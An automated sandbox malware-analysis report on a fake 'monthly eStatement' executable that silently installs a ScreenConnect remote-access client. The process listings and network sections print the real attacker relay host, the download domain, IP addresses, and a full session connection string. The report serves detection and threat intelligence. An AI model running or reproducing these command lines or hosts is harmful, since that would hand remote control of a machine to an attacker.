Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
monthly-eStatementForum120478962.Client.exe

Overview

General Information

Sample name:monthly-eStatementForum120478962.Client.exe
Analysis ID:1551950
MD5:27bd2490fd75556aab2df57ea7c1147f
SHA1:4eb9656ede1fed23fdaeb67815afcd489ded0f77
SHA256:7d6376247db9e267f27d1d6bf32b48afcab0ad277706fc0135d803645f7852a5
Infos:

Detection

ScreenConnect Tool
Score:51
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • monthly-eStatementForum120478962.Client.exe (PID: 2260 cmdline: "C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe" MD5: 27BD2490FD75556AAB2DF57EA7C1147F)
    • dfsvc.exe (PID: 6172 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 5432 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)
        • ScreenConnect.ClientService.exe (PID: 5764 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • WerFault.exe (PID: 1864 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 700 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 3224 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 4464 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2260 -ip 2260 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2972 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3524 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 1440 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 3836 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "d9b9f156-2a83-4b1f-b5ba-62c20ee02a77" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      SourceRuleDescriptionAuthorStrings
      00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000002.00000002.2973425425.0000025D1D9AB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          Process Memory Space: dfsvc.exe PID: 6172JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5432JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: ScreenConnect.ClientService.exe PID: 5764JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                SourceRuleDescriptionAuthorStrings
                9.0.ScreenConnect.WindowsClient.exe.ba0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49705, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 6172, Protocol: tcp, SourceIp: 194.59.30.201, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 3224, ProcessName: svchost.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-08T11:01:18.080245+010020229301A Network Trojan was detected20.109.210.53443192.168.2.549729TCP
                  2024-11-08T11:01:55.669523+010020229301A Network Trojan was detected20.109.210.53443192.168.2.549930TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-08T11:01:13.781744+010020098971A Network Trojan was detected194.59.30.201443192.168.2.549722TCP
                  2024-11-08T11:01:15.767488+010020098971A Network Trojan was detected194.59.30.201443192.168.2.549724TCP
                  2024-11-08T11:01:21.003552+010020098971A Network Trojan was detected194.59.30.201443192.168.2.549736TCP
                  2024-11-08T11:01:22.684812+010020098971A Network Trojan was detected194.59.30.201443192.168.2.549743TCP
                  2024-11-08T11:01:25.138450+010020098971A Network Trojan was detected194.59.30.201443192.168.2.549756TCP
                  2024-11-08T11:01:26.702035+010020098971A Network Trojan was detected194.59.30.201443192.168.2.549767TCP
                  2024-11-08T11:01:32.679860+010020098971A Network Trojan was detected194.59.30.201443192.168.2.549802TCP
                  2024-11-08T11:01:37.035829+010020098971A Network Trojan was detected194.59.30.201443192.168.2.549818TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.5% probability
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009A1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior

                  Compliance

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: certificate valid
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.5:49736 version: TLS 1.2
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D8E9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2447633526.0000000002CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: monthly-eStatementForum120478962.Client.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1D8E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2445494046.00000000027A2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3289162550.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3288573826.00000000012B0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.2441384367.00000000009BD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D916000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC3E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2451601548.000000001BEB2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D916000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC3E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2451601548.000000001BEB2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D8E9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2447633526.0000000002CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D738000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC3E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2446246290.0000000004CB2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A4A4B FindFirstFileExA,0_2_009A4A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior

                  Networking

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeRegistry value created: NULL Service
                  Source: global trafficTCP traffic: 192.168.2.5:49860 -> 194.59.30.201:8041
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: Joe Sandbox ViewIP Address: 194.59.30.201 194.59.30.201
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49722
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49756
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49729
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49724
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49743
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49736
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49802
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49930
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49767
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.5:49818
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
